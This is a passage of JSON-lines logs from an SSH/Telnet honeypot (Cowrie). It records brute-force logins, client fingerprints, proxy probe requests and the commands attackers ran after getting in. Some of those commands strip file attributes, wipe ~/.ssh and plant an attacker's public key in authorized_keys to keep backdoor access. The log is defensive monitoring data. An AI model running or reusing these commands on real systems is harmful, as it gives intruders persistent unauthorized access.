{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T06:23:08.060621Z","src_ip":"77.83.207.83","session":"858d91a76ab2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14945,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:14945","sensor":"my-vps","timestamp":"2025-08-31T06:23:08.205172Z","session":"858d91a76ab2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T06:23:08.255955Z","src_ip":"77.83.207.83","session":"858d91a76ab2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":3880,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:3880","sensor":"my-vps","timestamp":"2025-08-31T06:23:08.401065Z","session":"858d91a76ab2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T06:23:08.451791Z","src_ip":"77.83.207.83","session":"858d91a76ab2"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:23:08.503487Z","src_ip":"77.83.207.83","session":"858d91a76ab2"}
{"eventid":"cowrie.session.closed","duration":"71.9","message":"Connection lost after 71.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:23:11.487853Z","src_ip":"212.227.235.229","session":"56bfb41fcec8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56122,"dst_ip":"1.2.3.4","dst_port":22,"session":"f170b19f184c","protocol":"ssh","message":"New connection: 212.227.235.229:56122 (1.2.3.4:22) [session: f170b19f184c]","sensor":"my-vps","timestamp":"2025-08-31T06:23:14.205741Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:23:14.206412Z","src_ip":"212.227.235.229","session":"f170b19f184c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:23:14.463922Z","src_ip":"212.227.235.229","session":"f170b19f184c"}
{"eventid":"cowrie.login.failed","username":"test","password":"test2","message":"login attempt [test/test2] failed","sensor":"my-vps","timestamp":"2025-08-31T06:23:15.534476Z","src_ip":"212.227.235.229","session":"f170b19f184c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:23:16.795515Z","src_ip":"212.227.235.229","session":"f170b19f184c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58034,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0d253664cce","protocol":"ssh","message":"New connection: 212.227.235.229:58034 (1.2.3.4:22) [session: c0d253664cce]","sensor":"my-vps","timestamp":"2025-08-31T06:23:17.554395Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":22133,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b65307b47a4","protocol":"ssh","message":"New connection: 212.227.235.229:22133 (1.2.3.4:22) [session: 2b65307b47a4]","sensor":"my-vps","timestamp":"2025-08-31T06:23:18.432755Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:23:18.437054Z","src_ip":"212.227.235.229","session":"2b65307b47a4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:23:18.650864Z","src_ip":"212.227.235.229","session":"2b65307b47a4"}
{"eventid":"cowrie.login.success","username":"root","password":"anon","message":"login attempt [root/anon] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:23:19.510428Z","src_ip":"212.227.235.229","session":"2b65307b47a4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:23:19.963969Z","src_ip":"212.227.235.229","session":"2b65307b47a4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:23:19.964646Z","src_ip":"212.227.235.229","session":"2b65307b47a4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:23:19.965478Z","src_ip":"212.227.235.229","session":"2b65307b47a4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:23:20.180885Z","src_ip":"212.227.235.229","session":"2b65307b47a4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:23:20.682254Z","src_ip":"212.227.235.229","session":"2b65307b47a4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:23:20.683280Z","src_ip":"212.227.235.229","session":"2b65307b47a4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:23:20.901139Z","src_ip":"212.227.235.229","session":"2b65307b47a4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:23:20.902100Z","src_ip":"212.227.235.229","session":"2b65307b47a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38781,"dst_ip":"1.2.3.4","dst_port":22,"session":"416793dfb322","protocol":"ssh","message":"New connection: 212.227.235.229:38781 (1.2.3.4:22) [session: 416793dfb322]","sensor":"my-vps","timestamp":"2025-08-31T06:23:21.114607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:23:21.116546Z","src_ip":"212.227.235.229","session":"416793dfb322"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:23:21.330603Z","src_ip":"212.227.235.229","session":"416793dfb322"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:23:22.190177Z","src_ip":"212.227.235.229","session":"416793dfb322"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:23:23.408676Z","src_ip":"212.227.235.229","session":"416793dfb322"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44524,"dst_ip":"1.2.3.4","dst_port":22,"session":"66d993b61248","protocol":"ssh","message":"New connection: 212.227.235.229:44524 (1.2.3.4:22) [session: 66d993b61248]","sensor":"my-vps","timestamp":"2025-08-31T06:23:23.625459Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:23:23.626117Z","src_ip":"212.227.235.229","session":"66d993b61248"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:23:23.643600Z","src_ip":"212.227.235.229","session":"c0d253664cce"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:23:23.706373Z","src_ip":"212.227.235.229","session":"c0d253664cce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:23:23.843665Z","src_ip":"212.227.235.229","session":"66d993b61248"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:23:24.756760Z","src_ip":"212.227.235.229","session":"66d993b61248"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:23:24.978232Z","src_ip":"212.227.235.229","session":"2b65307b47a4"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:23:24.979054Z","src_ip":"212.227.235.229","session":"66d993b61248"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49099,"dst_ip":"1.2.3.4","dst_port":22,"session":"f75cf37a715d","protocol":"ssh","message":"New connection: 212.227.235.229:49099 (1.2.3.4:22) [session: f75cf37a715d]","sensor":"my-vps","timestamp":"2025-08-31T06:23:35.179674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:23:35.180943Z","src_ip":"212.227.235.229","session":"f75cf37a715d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:23:35.354085Z","src_ip":"212.227.235.229","session":"f75cf37a715d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47022,"dst_ip":"1.2.3.4","dst_port":22,"session":"7774a0b9fe8b","protocol":"ssh","message":"New connection: 212.227.235.229:47022 (1.2.3.4:22) [session: 7774a0b9fe8b]","sensor":"my-vps","timestamp":"2025-08-31T06:23:39.235261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:23:39.913539Z","src_ip":"212.227.235.229","session":"7774a0b9fe8b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:23:39.914191Z","src_ip":"212.227.235.229","session":"7774a0b9fe8b"}
{"eventid":"cowrie.login.success","username":"root","password":"Y4k1nm4suk.2019","message":"login attempt [root/Y4k1nm4suk.2019] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:23:43.100475Z","src_ip":"212.227.235.229","session":"f75cf37a715d"}
{"eventid":"cowrie.session.connect","src_ip":"3.130.96.91","src_port":60990,"dst_ip":"1.2.3.4","dst_port":23,"session":"c3379748167f","protocol":"telnet","message":"New connection: 3.130.96.91:60990 (1.2.3.4:23) [session: c3379748167f]","sensor":"my-vps","timestamp":"2025-08-31T06:23:43.171448Z"}
{"eventid":"cowrie.session.closed","duration":0.001329183578491211,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:23:43.172701Z","src_ip":"3.130.96.91","session":"c3379748167f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:23:43.475389Z","src_ip":"212.227.235.229","session":"f75cf37a715d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:23:43.476157Z","src_ip":"212.227.235.229","session":"f75cf37a715d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:23:43.478727Z","src_ip":"212.227.235.229","session":"f75cf37a715d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:23:43.884467Z","src_ip":"212.227.235.229","session":"f75cf37a715d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:23:45.135484Z","src_ip":"212.227.235.229","session":"f75cf37a715d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd 